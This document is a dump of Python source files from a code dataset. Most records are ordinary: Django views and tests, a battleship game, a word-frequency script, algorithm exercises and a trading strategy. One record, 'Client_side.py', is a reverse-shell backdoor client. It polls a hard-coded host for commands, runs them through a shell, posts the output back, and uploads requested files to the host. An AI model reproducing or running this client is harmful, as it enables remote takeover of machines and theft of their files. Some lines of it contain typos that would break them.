conf_file = os.path.realpath(\"/home/{0}/.cmui.conf\".format(os.getlogin()))\n\n conf = Configuration(conf_file)\n\n indicator = CheckCMU(conf)\n indicator.main()\n\n# vim:set shiftwidth=4 softtabstop=4:\n","sub_path":"cmu-indicator.py","file_name":"cmu-indicator.py","file_ext":"py","file_size_in_byte":6704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"475197785","text":"#:coding=utf-8:\n\nfrom django.test import TestCase as DjangoTestCase\n\nfrom beproud.django.commons.shortcuts import get_object_or_None, make_simple_response\n\nfrom beproud.django.commons.tests.test_shortcuts.shortcuts_app.models import ShortcutModel\n\n\nclass GetObjectOrNoneTestCase(DjangoTestCase):\n\n def test_simple(self):\n obj = get_object_or_None(ShortcutModel, pk=1)\n self.assertTrue(obj is not None)\n\n def test_queryset(self):\n qs = ShortcutModel.objects.filter(name=\"queryset\")\n obj = get_object_or_None(qs, pk=2)\n self.assertTrue(obj is not None)\n\n def test_none(self):\n obj = get_object_or_None(ShortcutModel, pk=5)\n self.assertTrue(obj is None)\n\n\nclass MakeSimpleResponseTestCase(DjangoTestCase):\n\n def test_simple(self):\n response = make_simple_response()\n self.assertEqual(\n response.content,\n u'{\"msg\": \"\\\\u51e6\\\\u7406\\\\u304c\\\\u6210\\\\u529f\\\\u3057\\\\u307e\\\\u3057\\\\u305f\"}',\n )\n","sub_path":"beproud/django/commons/tests/test_shortcuts/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"373159954","text":"from django.conf.urls import url, include\nfrom . import views\nfrom JuEq.views import Equipos\n\n\napp_name='JuEq'\nurlpatterns=[\n\turl(r'^$', views.home, name='home'),\n\turl(r'^nuevo/equipo/$', views.nuevoE, name=\"nuevoE\"),\n\turl(r'^nuevo/jugador/$', views.nuevoJ, name=\"nuevoJ\"),\n\turl(r'^equipos/$', views.Equipos.as_view(), name=\"equipos\"),\n\turl(r'^login/$', views.login_view, name=\"login\"),\n\turl(r'^logout/', views.logout_view, name=\"logout\"),\n\turl(r'^equipo/(?P\\d+)/$', views.EquipoView.as_view(), name=\"EquipoView\"),\n]","sub_path":"JuEq/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"258603014","text":"import requests\nimport os\nimport subprocess\nimport time\n\nwhile True:\n\n req = requests.get('http://192.168.1.1:8080')\n command = req.text\n if 'terminate' in command:\n break\n elif 'grab' in command:\n grab, path = command.spilit(\"*\")\n if os.path.exists(path):\n url = \"http://192.168.1.1:80/store\"\n files = {'file': open(path, 'rb')}\n r = requests.post(url, files = files)\n else:\n post_response = requests.post(url = 'http://192.168.1.1:8080', data = '[-] Not able')\n else:\n cmd = subprocess.Popen(command.decode(),shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n post_responserequests.post(url = 'http://192.168.1.1:8080', data = cmd.stdout.read())\n post_responserequests.post(url = 'http://192.168.1.1:8080', data = cmd.stderr.read())\n time.sleep(3)\n","sub_path":"Python_EXT_COD1/Coding_Upload_file_Data_Exfiltration/Client_side.py","file_name":"Client_side.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"113624203","text":"# coding=utf-8\nimport json\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.http import HttpResponseRedirect, HttpResponse, HttpResponseForbidden\nfrom django.shortcuts import render, resolve_url, get_object_or_404\nfrom django.template.loader import render_to_string\nfrom django.views.decorators.csrf import ensure_csrf_cookie\nimport sys\nfrom Series.models import Series\nfrom Words.forms import WordForm\nfrom Words.models import Words\n\n\n@login_required\ndef setorder(request, sort_field='name_en'):\n\n if 'sort_field' in request.session and 'sort_order' in request.session:\n if request.session['sort_field'] == sort_field:\n request.session['sort_order'] = not request.session['sort_order']\n else:\n request.session['sort_field'] = sort_field\n request.session['sort_order'] = True\n else:\n request.session['sort_field'] = sort_field\n request.session['sort_order'] = True\n\n if 'current_series_slug' in request.session:\n series_slug = request.session['current_series_slug']\n redirect_to = resolve_url('/words/'+ series_slug)\n else:\n redirect_to = resolve_url('allwords')\n\n return HttpResponseRedirect(redirect_to)\n\n@login_required\ndef getWordsListViaSeries(request, series_slug = 'allwords'):\n\n allwordsActive = False\n unAllocatedActive = False\n\n if 'sort_field' in request.session and 'sort_order' in request.session:\n sort_order = \"\"\n if request.session['sort_order'] == False:\n sort_order = \"-\"\n sort_field = sort_order + request.session['sort_field']\n else:\n sort_field = 'name_en'\n request.session['sort_field'] = sort_field\n request.session['sort_order'] = True\n\n\n if series_slug == 'allwords':\n words = Words.objects.filter(user=request.user).order_by(sort_field)\n allwordsActive = True\n elif series_slug == 'unallocatedwords':\n words = Words.objects.filter(series__isnull=True, user=request.user).order_by(sort_field)\n unAllocatedActive = True\n else:\n serie = Series.objects.get(slug=series_slug, user=request.user)\n words = Words.objects.filter(series=serie, user=request.user).order_by(sort_field)\n\n\n series = Series.objects.filter(user=request.user)\n\n allwordsscount = Words.objects.filter(user=request.user).count()\n notallocatedcount = Words.objects.filter(series__isnull=True, user=request.user).count()\n\n series_list = []\n series_list.append([u'Все', 'allwords', allwordsscount, allwordsActive,'Words.allwords'])\n series_list.append([u'Не подшитые', 'unallocatedwords', notallocatedcount, unAllocatedActive, 'Words.unallocatedwords'])\n\n for item in series:\n wordsOfSeries = Words.objects.filter(user=request.user, series=item )\n if item.slug == series_slug:\n series_list.append([item.name, item.slug, wordsOfSeries.count(), True, 'Words.allwordsOfSeries'])\n else:\n series_list.append([item.name, item.slug, wordsOfSeries.count(), False, 'Words.allwordsOfSeries'])\n\n\n paginator = Paginator(words, request.user.profile.words_per_page)\n page = request.GET.get('page')\n try:\n #page = int(page)\n words = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n words = paginator.page(1)\n except EmptyPage:\n words = paginator.page(paginator.num_pages)\n\n context = {\n 'wordslist': words,\n 'groups': series_list,\n 'sort_field': request.session['sort_field'],\n 'sort_order': request.session['sort_order'],\n }\n\n request.session['current_series_slug'] = series_slug\n\n return context\n\n@login_required\ndef allwordsOfSeries(request,series_slug='allwords', template_name='words.html', extra_context=None):\n context = getWordsListViaSeries(request,series_slug)\n\n if extra_context is not None:\n context.update(extra_context)\n\n return render(request, template_name, context)\n\n@login_required\n@ensure_csrf_cookie\ndef delete_words(request):\n\n if request.is_ajax():\n\n try:\n idarray = request.POST['words_id_array']\n\n iddict = json.loads(idarray)\n for element in iddict:\n word = Words.objects.filter(user=request.user, id=element.get('value'))\n word.delete()\n\n response = json.dumps({'success':'True'})\n except:\n error_text = u'Неожиданная ошибка: ' + sys.exc_info()[1].message\n html = render_to_string(\"error.html\", {'error_text': error_text})\n response = json.dumps({'success':'False','html': html})\n\n return HttpResponse(response, content_type='application/javascript; charset=utf-8')\n else:\n return HttpResponseForbidden()\n\n@login_required\ndef newword(request, template_name='newword.html', extra_context=None):\n\n if request.method == 'POST':\n postdata = request.POST.copy()\n form = WordForm(postdata)\n if form.is_valid():\n new_word = form.save(request.user)\n if new_word.series != None:\n redirect_to = resolve_url('/words/'+ new_word.series.slug)\n else:\n redirect_to = resolve_url('words')\n return HttpResponseRedirect(redirect_to)\n else:\n word = Words()\n if 'current_series_slug' in request.session:\n series_slug = request.session['current_series_slug']\n try:\n current_serie = Series.objects.get(slug=series_slug)\n word.series = current_serie\n except ObjectDoesNotExist:\n pass\n\n form = WordForm(instance=word)\n\n context = {\n 'form': form,\n }\n\n if extra_context is not None:\n context.update(extra_context)\n\n return render(request, template_name, context)\n\n@login_required\ndef editword(request, word_slug, template_name='newword.html', extra_context=None):\n\n word1 = get_object_or_404(Words,slug = word_slug, user=request.user)\n if request.method == 'POST':\n postdata = request.POST.copy()\n form = WordForm(postdata,instance=word1)\n if form.is_valid():\n\n updated_word = form.save(request.user)\n if updated_word.series != None:\n redirect_to = resolve_url('/words/'+ updated_word.series.slug)\n else:\n redirect_to = resolve_url('words')\n return HttpResponseRedirect(redirect_to)\n else:\n form = WordForm(instance=word1)\n\n context = {\n 'form': form,\n }\n\n if extra_context is not None:\n context.update(extra_context)\n\n return render(request, template_name, context)\n","sub_path":"Words/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"519365303","text":"# File: Books.py\n\n# Description: Computes word frequency statistics for two novels, and compares their differences.\n\n# Date Created: 04/24/2016\n\n# Date Last Modified:04/27/2016\n######################################################################################################\n\n# Create word dictionary from the comprehensive word list\nword_dict = {}\ndef create_word_dict (file):\n str = file.read().strip()\n keys = str.split()\n for key in keys:\n word_dict[key] = 0\n file.close()\n return word_dict\n# Removes punctuation marks from a string\ndef parseString(line):\n words = line.split()\n punctuations = '''!()-[]{};:\"\\,<>./?@#$%^&*_~'''\n for str in words:\n for char in str:\n if(char in punctuations):\n char_old = char\n char_new = \" \"\n line = line.replace(char_old, char_new)\n elif(char == \"'\"):\n # remove punctuation from the string\n if(str.endswith(\"'s\") or str.endswith(\"'\")):\n if(str.endswith(\"'s\")):\n str_old = str\n\n str = str.replace(\"'s\", \"\")\n line = line.replace(str_old, str)\n elif(str.endswith(\"'\")):\n str_old = str\n str_new = str.replace(\"'\", \"\")\n line = line.replace(str_old, str_new)\n elif(char.isdigit() == True):\n char_old = char\n char_new = \"\"\n line = line.replace(char_old, char_new)\n return line\n# This function creates a list containing the keys that begin with a capital letter\ndef get_caps(dict):\n caps_list = []\n for key in dict:\n if(key[0].isupper() == True):\n caps_list.append(key)\n return caps_list\n\n# This dictionary computes the word counts for the specific text\ndef getWordFreq (file):\n word_counts = {}\n for line in file:\n line = parseString(line)\n words = line.split()\n for word in words:\n if (word in word_counts):\n word_counts[word] += 1\n else:\n word_counts[word] = 1\n # Call get_caps function\n caps_list = get_caps(word_counts)\n for item in caps_list:\n if(item.lower() in word_counts):\n word_counts[item.lower()] += (word_counts[item])\n elif(item.lower() in word_dict):\n word_counts[item.lower()] = 1\n del word_counts[item]\n return word_counts\n# This computes the total word count including duplicates\ndef total_words(word_counts):\n total = 0\n for word in word_counts:\n total += word_counts.get(word)\n return total\n# This functions computes statistics for the two novels\ndef wordComparison(author1, freq1, author2, freq2):\n\n distinct_count1 = len(freq1)\n distinct_count2 = len(freq2)\n total1 = total_words(freq1)\n total2 = total_words(freq2)\n\n D = set(freq1)\n H = set(freq2)\n D_not_H = (D - H)\n H_not_D = (H - D)\n sum1 = 0\n for word in D_not_H:\n sum1 += freq1.get(word)\n sum2 = 0\n for word in H_not_D:\n sum2 += freq2.get(word)\n # Here is the data for the first author\n print(author1)\n print(\"Total distinct words = \",distinct_count1)\n print(\"Total words (including duplicates) = \",total1)\n print(\"Ratio (% of total distinct words to total words) = \", round(100*(distinct_count1/total1), 10), \"\\n\")\n # Here is the data for the second author\n print(author2)\n print(\"Total distinct words = \",distinct_count2)\n print(\"Total words (including duplicates) = \",total2)\n print(\"Ratio (% of total distinct words to total words) = \", round(100*(distinct_count2/total2), 10),\"\\n\")\n print(author1, \"used\", len(D_not_H), \"words that\", author2, \"did not use.\")\n # Here is the data for the set differences\n print(\"Relative frequency of words used by\", author1, \"not in common with\", author2, \"= %.10f\" % ((sum1/ total1)*100),\"\\n\")\n print(author2, \"used\", len(H_not_D), \"words that\", author1, \"did not use.\")\n print(\"Relative frequency of words used by\", author2, \"not in common with\", author1, \"= %.10f\" % ((sum2/ total2)*100),\"\\n\")\n# Calling main function\ndef main():\n #Create word dictionary from comprehensive word list\n dict_file = open(\"words.txt\", \"r\")\n word_dict = create_word_dict(dict_file)\n\n #Enter names of the two books in electronic form\n book1 = input(\"Enter name of first book: \").strip()\n book2 = input(\"Enter name of second book: \").strip()\n print()\n\n # Enter names of the two authors\n author1 = input(\"Enter last name of first author: \")\n author2 = input(\"Enter last name of second author: \")\n print()\n\n # Get the frequency of words used by the two authors\n file_name1 = (book1 + \".txt\").strip()\n file_name2 = (book2 + \".txt\").strip()\n file1 = open(file_name1, \"r\")\n file2 = open(file_name2, \"r\")\n wordFreq1 = getWordFreq(file1)\n wordFreq2 = getWordFreq(file2)\n\n # Compare the relative frequency of uncommon words used by the two authors\n wordComparison (author1, wordFreq1, author2, wordFreq2)\n\nmain()\n","sub_path":"Books.py","file_name":"Books.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"284804108","text":"from algotrader.event.order import OrdAction\nfrom algotrader.strategy.strategy import Strategy\n\n\nclass MertonOptimalBaby(Strategy):\n \"\"\"\n This is the baby version that assume appreciation rate and the volatility of the underlying is known\n in advance before constructing the strategy\n in reality this is not true\n So for more advanced version the strategy itself should able to call statistical inference logic to\n get the appreciation rate and volatility of the asset\n\n So now this class is used as testing purpose\n \"\"\"\n\n def __init__(self, stg_id=None, stg_configs=None):\n super(MertonOptimalBaby, self).__init__(stg_id=stg_id, stg_configs=stg_configs)\n self.buy_order = None\n\n def _start(self, app_context, **kwargs):\n self.arate = self.get_stg_config_value(\"arate\", 1)\n self.vol = self.get_stg_config_value(\"vol\", 1)\n\n self.bar = app_context.inst_data_mgr.get_series(\"Bar.%s.Time.86400\" % self.app_context.app_config.instrument_ids[0])\n self.bar.start(app_context)\n\n self.optimal_weight = self.arate / self.vol ** 2 # assume risk free rate is zero\n\n super(MertonOptimalBaby, self)._start(app_context, **kwargs)\n\n def _stop(self):\n super(MertonOptimalBaby, self)._stop()\n\n def on_bar(self, bar):\n # we have to rebalance on each bar\n # print bar\n portfolio = self.get_portfolio()\n allocation = portfolio.total_equity * self.optimal_weight\n delta = allocation - portfolio.stock_value\n if delta > 0:\n qty = delta / bar.close # assume no lot size here\n self.market_order(inst_id=bar.inst_id, action=OrdAction.BUY, qty=qty)\n else:\n qty = -delta / bar.close # assume no lot size here\n self.market_order(inst_id=bar.inst_id, action=OrdAction.SELL, qty=qty)\n","sub_path":"algotrader/strategy/merton_optimal.py","file_name":"merton_optimal.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"406935590","text":"\"\"\"\r\nBattleship Project\r\nName:\r\nRoll No:\r\n\"\"\"\r\n\r\nimport battleship_tests as test\r\n\r\nproject = \"Battleship\" # don't edit this\r\n\r\n### SIMULATION FUNCTIONS ###\r\n\r\nfrom tkinter import *\r\nimport random\r\n\r\nEMPTY_UNCLICKED = 1\r\nSHIP_UNCLICKED = 2\r\nEMPTY_CLICKED = 3\r\nSHIP_CLICKED = 4\r\n\r\n\r\n'''\r\nmakeModel(data)\r\nParameters: dict mapping strs to values\r\nReturns: None\r\n'''\r\ndef makeModel(data):\r\n data[\"number of rows\"]=10\r\n data[\"number of cols\"]=10\r\n data[\"board size\"]=500\r\n data[\"number of ships\"]=5\r\n data[\"cellsize\"]=data[\"board size\"]/data[\"number of rows\"]\r\n data[\"computer\"]=emptyGrid(data[\"number of rows\"],data[\"number of cols\"])\r\n data[\"user\"]=emptyGrid(data[\"number of rows\"],data[\"number of cols\"])\r\n data[\"temporary ship\"]=[]\r\n data[\"numships\"]=0\r\n data[\"winner\"]=None\r\n data[\"max num of turns\"]=50\r\n data[\"current num of turns\"]=0\r\n addShips(data[\"computer\"],data[\"number of ships\"])\r\n'''\r\nmakeView(data, userCanvas, compCanvas)\r\nParameters: dict mapping strs to values ; Tkinter canvas ; Tkinter canvas\r\nReturns: None\r\n'''\r\ndef makeView(data, userCanvas, compCanvas):\r\n drawGrid(data,userCanvas,data[\"user\"],True)\r\n drawGrid(data,compCanvas,data[\"computer\"],False)\r\n drawShip(data,userCanvas,data[\"temporary ship\"])\r\n drawGameOver(data,userCanvas)\r\n\r\n\r\n'''\r\nkeyPressed(data, events)\r\nParameters: dict mapping strs to values ; key event object\r\nReturns: None\r\n'''\r\ndef keyPressed(data, event):\r\n print(event,type(event))\r\n if event.char=='\\r':\r\n makeModel(data)\r\n\r\n\r\n'''\r\nmousePressed(data, event, board)\r\nParameters: dict mapping strs to values ; mouse event object ; 2D list of ints\r\nReturns: None\r\n'''\r\ndef mousePressed(data, event, board):\r\n if data[\"winner\"]==None:\r\n if board==\"comp\":\r\n if data[\"numships\"]==5:\r\n cell=getClickedCell(data,event)\r\n runGameTurn(data,cell[0],cell[1])\r\n if data[\"numships\"]<5:\r\n if board==\"user\":\r\n cell=getClickedCell(data,event)\r\n clickUserBoard(data,cell[0],cell[1])\r\n \r\n#### WEEK 1 ####\r\n\r\n'''\r\nemptyGrid(rows, cols)\r\nParameters: int ; int\r\nReturns: 2D list of ints\r\n'''\r\ndef emptyGrid(rows, cols):\r\n grid=[]\r\n for row in range (rows):\r\n grid.append([])\r\n d=grid[row]\r\n for col in range(cols):\r\n d.append(EMPTY_UNCLICKED)\r\n return grid\r\n\r\n\r\n'''\r\ncreateShip()\r\nParameters: no parameters\r\nReturns: 2D list of ints\r\n'''\r\ndef createShip():\r\n row=random.randint(1,8)\r\n col=random.randint(1,8)\r\n align=random.randint(0,1)\r\n if align==0:\r\n ship=[[row-1,col],[row,col],[row+1,col]]\r\n else:\r\n ship=[[row,col-1],[row,col],[row,col+1]]\r\n return ship\r\n\r\n\r\n'''\r\ncheckShip(grid, ship)\r\nParameters: 2D list of ints ; 2D list of ints\r\nReturns: bool\r\n'''\r\ndef checkShip(grid, ship):\r\n for i in range(len(ship)):\r\n x=ship[i][0]\r\n y=ship[i][1]\r\n if grid[x][y]!=EMPTY_UNCLICKED:\r\n return False\r\n return True\r\n\r\n\r\n'''\r\naddShips(grid, numShips)\r\nParameters: 2D list of ints ; int\r\nReturns: 2D list of ints\r\n'''\r\ndef addShips(grid, numShips):\r\n j=0\r\n while j\", lambda event : keyEventHandler(data, userCanvas, compCanvas, event))\r\n compWindow.bind(\"\", lambda event : keyEventHandler(data, userCanvas, compCanvas, event))\r\n userCanvas.bind(\"\", lambda event : mouseEventHandler(data, userCanvas, compCanvas, event, \"user\"))\r\n compCanvas.bind(\"\", lambda event : mouseEventHandler(data, userCanvas, compCanvas, event, \"comp\"))\r\n\r\n updateView(data, userCanvas, compCanvas)\r\n\r\n root.mainloop()\r\n\r\n\r\n### RUN CODE ###\r\n\r\n# This code runs the test cases to check your work\r\nif __name__ == \"__main__\":\r\n # test.testEmptyGrid()\r\n # test.testCreateShip()\r\n # test.testCheckShip()\r\n # test.testAddShips()\r\n # test.testMakeModel()\r\n # test.testIsVertical()\r\n # test.testIsHorizontal()\r\n # test.testGetClickedCell()\r\n # test.testShipIsValid()\r\n # test.testUpdateBoard()\r\n # test.testGetComputerGuess()\r\n # test.testIsGameOver()\r\n ## Finally, run the simulation to test it manually ##\r\n runSimulation(500, 500)\r\n","sub_path":"battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":11908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"264265193","text":"from argparse import ArgumentParser\nimport utils\n\ndef parseArgs():\n parser = ArgumentParser(description='Process arguments.')\n parser.add_argument('sum', metavar='S', type=int, help='sum to match')\n parser.add_argument('number', metavar='N', type=int, help='number of elements that sum up to the given sum')\n return parser.parse_args()\n\ndef main():\n args = parseArgs()\n content = utils.readFile('../../inputs/day1.txt')\n\n els = utils.findElements(content, args.sum, args.number)\n if len(els) == 0:\n print(\"No sequences found.\")\n else:\n print(\"\\n\".join([ \"Found [\" + \", \".join([str(ie) for ie in e]) + \"] with product of \" + str(p) + \".\" for e, p in els ]))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"python/day1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"383507143","text":"\"\"\"Home page handlers\"\"\"\n\nimport json\nimport logging\nimport tornado\nfrom tornado import gen\nfrom ..base.handlers import BaseHandler\n\nLOGGER = logging.getLogger(__name__)\n\nclass DataSourceSettingsHandler(BaseHandler):\n \"\"\" Datasource settings page handler \"\"\"\n\n @gen.coroutine\n @tornado.web.authenticated\n def get(self):\n \"\"\"GET method for datasource settings\"\"\"\n self.render(\"home/home.html\")\n\n @gen.coroutine\n @tornado.web.authenticated\n def post(self):\n \"\"\"POST method for datasource settings\"\"\"\n datasource_settings = json.dumps(\\\n {element: self.get_argument(element) for element in self.request.arguments})\n print('\\n\\n\\n')\n from pprint import pprint\n pprint(datasource_settings)\n print('\\n\\n\\n')\n self.db_cur.execute(\\\n \"INSERT INTO datasource_settings (user_id, type, datasource_access_settings)\\\n VALUES (%s, %s, %s);\", (str(self.current_user[\"id\"]), 1, datasource_settings))\n self.db_conn.commit()\n self.redirect(\"/user_settings\")\n","sub_path":"src/app/models/datasource_settings/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"256357427","text":"## 1.柠檬水找零\nclass Solution:\n def lemonadeChange(self, bills: List[int]) -> bool:\n count_5, count_10 = 0, 0\n for i in bills:\n if i == 5:\n count_5 += 1\n elif i == 10:\n if count_5 > 0:\n count_5 -= 1\n else:\n return False\n count_10 += 1\n else:\n if count_10 > 0 and count_5 > 0:\n count_10 -= 1\n count_5 -= 1\n elif count_5 > 3:\n count_5 -= 3\n else:\n return False\n return True\n\n## 2.买卖股票的最佳时机 II\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n profit = 0\n length = len(prices)\n if length < 2:\n return profit\n for i in range(length-1):\n if prices[i] < prices[i+1]:\n profit += prices[i+1] - prices[i]\n return profit\n\n## 3.分发饼干\nclass Solution:\n def findContentChildren(self, g: List[int], s: List[int]) -> int:\n sort_g, sort_s = sorted(g), sorted(s)\n count = 0\n len_g, len_s = len(g), len(s)\n for i in range(len_s):\n if count == len_g:\n break\n if sort_s[i] >= sort_g[count]:\n count += 1\n return count\n\n## 4.模拟行走机器人\nclass Solution:\n def robotSim(self, commands: List[int], obstacles: List[List[int]]) -> int:\n obstacles = set(map(tuple, obstacles))\n direction = 1 # 0-west, 1-north, 2-east, 3-south\n dx = [-1, 0, 1, 0]\n dy = [0, 1, 0, -1]\n x, y = 0, 0\n dist = 0\n for i in commands:\n if i == -2:\n direction = (direction - 1) % 4\n elif i == -1:\n direction = (direction + 1) % 4\n else:\n for _ in range(i):\n if (x + dx[direction], y + dy[direction]) not in obstacles:\n x += dx[direction]\n y += dy[direction]\n dist = max(dist, x**2 + y**2)\n return dist\n\n## 5.单词接龙\nclass Solution:\n def ladderLength(self, beginWord, endWord, wordList):\n \"\"\"\n 1.BFS\n \"\"\"\n node = collections.defaultdict(list)\n for i in wordList:\n for j in range(len(i)):\n node[i[0:j] + \"*\" + i[j + 1:]].append(i)\n\n quene = collections.deque([beginWord])\n visit = {beginWord}\n count = 1\n while quene:\n count += 1\n for _ in range(len(quene)):\n beginWord = quene.popleft()\n for j in range(len(beginWord)):\n linked_node = node[beginWord[0:j] + \"*\" + beginWord[j + 1:]]\n for k in linked_node:\n if k not in visit:\n if k == endWord:\n return count\n visit.add(k)\n quene.append(k)\n return 0\n\n## 6.岛屿数量\nclass Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n \"\"\"\n 1.dfs\n 2.bfs\n \"\"\"\n count = 0\n if len(grid) == 0 or len(grid[0]) == 0:\n return count\n\n len_x, len_y = len(grid), len(grid[0])\n def dfs(x, y):\n if x < 0 or x >= len_x or y < 0 or y >= len_y:\n return\n if grid[x][y] == '1':\n grid[x][y] = '0'\n dfs(x - 1, y)\n dfs(x + 1, y)\n dfs(x , y - 1)\n dfs(x , y + 1)\n return\n\n for i in range(len_x):\n for j in range(len_y):\n if grid[i][j] == '1':\n count += 1\n dfs(i, j)\n return count\n\n## 7.扫雷游戏\nclass Solution:\n def updateBoard(self, board: List[List[str]], click: List[int]) -> List[List[str]]:\n \"\"\"\n 1.dfs\n 2.bfs\n \"\"\"\n x, y = click\n len_x, len_y = len(board), len(board[0])\n\n def dfs(x, y):\n if x < 0 or x >= len_x or y < 0 or y >= len_y:\n return\n if board[x][y] == 'M': # 1.挖到雷上\n board[x][y] = 'X'\n return\n elif board[x][y] == 'E':\n num_mine = check(x, y)\n if num_mine:\n board[x][y] = str(num_mine)\n else:\n board[x][y] = 'B'\n for i in [-1, 0, 1]:\n for j in [-1, 0, 1]:\n if i == 0 and j == 0:\n continue\n dfs(x + i, y + j)\n return\n return\n\n def check(x, y):\n num_mine = 0\n for i in [-1, 0, 1]:\n for j in [-1, 0, 1]:\n x_1, y_1 = x + i, y + j\n if x_1 < 0 or x_1 >= len_x or y_1 < 0 or y_1 >= len_y:\n continue\n if board[x_1][y_1] == 'M':\n num_mine += 1\n return num_mine\n\n dfs(x, y)\n return board\n\n## 8.跳跃游戏\nclass Solution:\n def canJump(self, nums: List[int]) -> bool:\n length = len(nums)\n cur_pos, max_pos = 0, 0\n while cur_pos <= max_pos:\n max_pos = max(max_pos, cur_pos+nums[cur_pos])\n if max_pos >= length-1:\n return True\n cur_pos += 1\n return False\n\n## 9.搜索旋转排序数组\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n if len(nums) == 0:\n return -1\n left, right = 0, len(nums) - 1\n while left <= right:\n mid = (left + right) // 2\n if nums[mid] == target:\n return mid\n elif (nums[left] < nums[mid] and nums[left] <= target < nums[mid]) or (nums[mid] < nums[right] and (target < nums[mid] or target > nums[right])):\n right = mid - 1\n else:\n left = mid + 1\n return -1\n\n## 10.搜索二维矩阵\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n m = len(matrix)\n if m == 0:\n return False\n n = len(matrix[0])\n if n == 0:\n return False\n left, right = 0, m * n - 1\n while left <= right:\n mid = (left + right) // 2\n x, y = mid // n, mid % n\n if matrix[x][y] == target:\n return True\n elif target < matrix[x][y]:\n right = mid - 1\n else:\n left = mid + 1\n return False\n\n## 11.单词接龙 II\nclass Solution:\n def findLadders(self, beginWord: str, endWord: str, wordList: List[str]) -> List[List[str]]:\n wordList_set = set(wordList)\n res = []\n if endWord not in wordList_set or len(wordList_set) == 0:\n return res\n\n use_node = collections.defaultdict(set)\n if self.bfs(beginWord, endWord, wordList_set, use_node):\n ans = [beginWord]\n self.dfs(beginWord, endWord, use_node, ans, res)\n return res\n\n def bfs(self, beginWord, endWord, wordList_set, use_node):\n reach = False\n quene = collections.deque([beginWord])\n early_visit = {beginWord}\n len_word = len(beginWord)\n while quene:\n if reach:\n break\n now_visit = set()\n length = len(quene)\n for i in range(length):\n ans = quene.popleft()\n ans_list = list(ans)\n for j in range(len_word):\n origin_char = ans_list[j]\n for k in string.ascii_lowercase:\n ans_list[j] = k\n new_word = \"\".join(ans_list)\n if new_word in wordList_set:\n if new_word == endWord:\n reach = True\n if new_word not in early_visit:\n use_node[ans].add(new_word)\n quene.append(new_word)\n if new_word not in now_visit:\n now_visit.add(new_word)\n ans_list[j] = origin_char\n early_visit = early_visit | now_visit\n return reach\n\n def dfs(self, beginWord, endWord, use_node, ans, res):\n if ans[-1] == endWord:\n res.append(ans[:])\n return\n if beginWord not in use_node:\n return\n for i in use_node[ans[-1]]:\n ans.append(i)\n self.dfs(i, endWord, use_node, ans, res)\n ans.pop()\n\n## 12.跳跃游戏 II\nclass Solution:\n def jump(self, nums: List[int]) -> int:\n length = len(nums)\n if length < 2:\n return 0\n cur_pos, max_pos = 0, 0\n count = 1\n while cur_pos <= max_pos:\n max_pos = max(max_pos, cur_pos + nums[cur_pos])\n if max_pos >= length - 1:\n return count\n max_step, max_idx = -1, -1\n right = max_pos + 1 if max_pos + 1 <= length else length\n for i in range(cur_pos + 1, right):\n if nums[i] + i >= max_step:\n max_step = nums[i] + i\n max_idx = i\n count += 1\n cur_pos = max_idx","sub_path":"Week04/week04.py","file_name":"week04.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"66706278","text":"# -*- coding: utf-8 -*-\nfrom random import randint\n\ndef dono_grupo(id_grupo):\n\tgrupo = db(Grupo.id == id_grupo).select().first()\n\tif auth.user and grupo.created_by == auth.user.id:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef participa_grupo(id_grupo):\n\tgrupo = db(Grupo.id == id_grupo).select().first()\n\tif auth.user:\n\t\tif grupo.created_by == auth.user.id:\n\t\t\treturn True\n\t\telif db((Usuario_Grupo.id_grupo == id_grupo) &\\\n\t\t\t\t(Usuario_Grupo.id_auth_user == auth.user.id)\\\n\t\t\t\t).count():\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\telse:\n\t\treturn False\n\ndef gerar_hash_id():\n\timport uuid\n\n\thash_id = str(uuid.uuid4())[-12:]\n\twhile db(Grupo.hash_id == hash_id).count():\n\t\thash_id = str(uuid.uuid4())[-12:]\n\n\treturn hash_id\n\ndef realizar_sorteio(participantes):\n\tfrom random import shuffle\n\tshuffle(participantes)\n\treturn participantes\n\n","sub_path":"models/global_functions.py","file_name":"global_functions.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
